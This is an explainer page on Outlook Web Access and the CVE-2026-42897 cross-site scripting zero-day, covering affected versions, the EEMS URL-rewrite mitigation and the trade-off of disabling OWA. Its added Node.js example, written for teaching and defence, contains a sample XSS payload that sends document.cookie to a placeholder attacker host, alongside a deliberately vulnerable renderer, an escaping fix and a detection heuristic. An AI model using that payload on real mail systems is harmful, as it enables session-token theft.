Outlook Web Access
The browser-based email interface for Microsoft Exchange Server; targeted by the CVE-2026-42897 cross-site scripting zero-day in May 2026.
Last refreshed: 20 May 2026
With no Exchange patch before 29 May, should organisations disable OWA entirely?
Timeline for Outlook Web Access
- Exchange repeats the CISA deadline-before-patch trap (Cybersecurity: Threats and Defences)
- Mentioned in: Patch Tuesday clean streak hides out-of-band KEVs (Cybersecurity: Threats and Defences)
- What is Outlook Web Access and how does the CVE-2026-42897 attack work?
- OWA is Exchange Server's browser-based mail interface. CVE-2026-42897 is a cross-site scripting flaw that lets an attacker inject script into pages served by OWA so that it runs in a victim's authenticated session, where it can steal session tokens or credentials. CVSS 8.1. (Source: Microsoft Security Response Center)
- Is Exchange Online affected by the CVE-2026-42897 OWA zero-day?
- No. CVE-2026-42897 affects on-premises Exchange Server 2016, 2019, and Subscription Edition only. Exchange Online (Microsoft 365) is not affected. (Source: Microsoft Security Response Center)
- Should we disable OWA to protect against CVE-2026-42897?
- Disabling OWA removes the vulnerable attack surface but also removes a primary remote-access channel. The alternative is the EEMS URL-rewrite mitigation, which breaks calendar printing, OWA Light mode, and inline images. Federal agencies face a 29 May deadline either way. (Source: CISA KEV / Help Net Security)
- What are XSS attacks and why are they dangerous in a mail client?
- Cross-site scripting (XSS) attacks inject malicious script into trusted web pages, where it runs with the privileges of the user viewing them. In a mail client like OWA, that script runs inside the victim's authenticated session and can steal session cookies, read mail and act as the user, or redirect victims to attacker-controlled sites, all without the attacker needing the user's password. Marking the session cookie HttpOnly keeps it out of reach of injected script, but does nothing about actions the script performs in the live session.
Background
Outlook Web Access (OWA) is the browser-based email client built into Microsoft Exchange Server, allowing users to access mailboxes, calendars, and contacts from any web browser without a local mail client. In May 2026, OWA became the attack surface for CVE-2026-42897, a cross-site scripting (XSS) zero-day rated CVSS 8.1, added to CISA's Known Exploited Vulnerabilities catalogue on 15 May 2026 with a 29 May federal deadline. As of this page's 20 May 2026 refresh, Microsoft had not shipped a patch. In an XSS attack, a threat actor injects malicious script into a page the web interface serves, so that it executes in the victim's browser inside the authenticated OWA session, enabling session-token theft, credential capture, or redirects to attacker-controlled infrastructure. Active exploitation against on-premises Exchange Server 2016, 2019, and Subscription Edition is confirmed; the cloud-hosted Exchange Online service is unaffected.
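The mechanism described in the FAQ answer on XSS and in the paragraph above, as an added example that is not code from this page, from Microsoft or from OWA: a minimal Node.js model of a webmail front end that interpolates untrusted message fields into HTML, the same layout with output escaping, a heuristic check for active content in the rendered markup, and a Set-Cookie attribute check for the session-token theft angle. The sample message, the placeholder host attacker.invalid and the cookie values are constructed; nothing here reproduces the actual injection point of CVE-2026-42897, which the page does not describe.

```javascript
// Added example, not code from the page, Microsoft or OWA. Models how an
// XSS payload carried in an email header reaches a browser session when a
// webmail front end drops untrusted strings into HTML, and what escaping
// does to it. Runs under Node.js; no Exchange server or real OWA involved.

// Constructed sample message as a webmail backend might hand it to the UI.
// The display name carries a cookie-exfiltration payload; the host
// attacker.invalid is a placeholder, not a real indicator.
const SAMPLE_MESSAGE = {
  from: '"Payroll" <payroll@example.com>' +
        '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">',
  subject: 'Q2 bonus schedule <script>alert(document.cookie)</script>',
  bodyText: 'Please review the attached schedule.',
};

// Escape the five characters that can change HTML context (text and
// quoted-attribute contexts).
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable renderer: untrusted fields go straight into markup, which is
// what element.innerHTML = ... does in the browser.
function renderUnsafe(msg) {
  return `<div class="hdr"><b>From:</b> ${msg.from}<br><b>Subject:</b> ${msg.subject}</div>` +
         `<div class="body">${msg.bodyText}</div>`;
}

// Hardened renderer: identical layout, every untrusted value escaped.
function renderSafe(msg) {
  return `<div class="hdr"><b>From:</b> ${escapeHtml(msg.from)}<br>` +
         `<b>Subject:</b> ${escapeHtml(msg.subject)}</div>` +
         `<div class="body">${escapeHtml(msg.bodyText)}</div>`;
}

// Heuristic detector for active content in rendered markup: script
// elements, inline event handlers and javascript: URLs inside tags. Useful
// in a test suite or when triaging captured responses; it is not a sanitiser.
function hasActiveContent(html) {
  const tags = html.match(/<[a-z][^>]*>/gi) || [];
  return tags.some((t) =>
    /^<script\b/i.test(t) || /\son[a-z]+\s*=/i.test(t) || /javascript\s*:/i.test(t));
}

// Session-token angle: a cookie without HttpOnly is readable by any script
// that runs in the session. Reports protective attributes missing from a
// Set-Cookie header value.
function missingCookieProtections(setCookie) {
  const attrs = setCookie.split(';').slice(1).map((a) => a.trim().toLowerCase());
  const missing = [];
  if (!attrs.includes('httponly')) missing.push('HttpOnly');
  if (!attrs.includes('secure')) missing.push('Secure');
  if (!attrs.some((a) => a.startsWith('samesite='))) missing.push('SameSite');
  return missing;
}

// Demonstration run.
console.log('unsafe render carries active content:', hasActiveContent(renderUnsafe(SAMPLE_MESSAGE)));
console.log('escaped render carries active content:', hasActiveContent(renderSafe(SAMPLE_MESSAGE)));
console.log('missing cookie protections:', missingCookieProtections('sessionid=abc123; Path=/'));
```

Output escaping is the fix for injection into HTML text and quoted-attribute contexts, which is where header fields such as sender and subject land; HTML message bodies that must render as markup need a real allowlist sanitiser instead, which this example deliberately does not attempt. The cookie check shows why HttpOnly matters even when a flaw is unpatched: it blocks the document.cookie read in the sample payload, though not the requests an injected script can make from inside the session.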
OWA has shipped with Exchange Server since the 1990s and has served as the de facto remote-access method for enterprises unwilling or unable to deploy VPN-based Outlook connectivity. Its browser-rendered interface makes it particularly sensitive to XSS flaws: a script injected into OWA's origin executes with the user's session cookie and every same-origin privilege the mailbox session holds, whereas a native client keeps its credentials in its own store, out of reach of page script.
Microsoft's only sanctioned mitigation for CVE-2026-42897 is a URL-rewrite rule delivered through the Exchange Emergency Mitigation Service (EEMS), which applies it to the server's IIS URL Rewrite configuration. The rule carries documented side effects: the OWA calendar print function stops working, inline images may fail to render, and OWA Light mode breaks entirely. Administrators can confirm from the Exchange Management Shell which mitigations a server has actually applied by inspecting the MitigationsEnabled, MitigationsApplied and MitigationsBlocked properties returned by Get-ExchangeServer. Organisations that instead disable OWA to eliminate the attack surface lose a primary remote-access channel, leaving CISOs to weigh user-experience degradation against confirmed exploitation risk in the fourteen days between the KEV listing and the CISA deadline.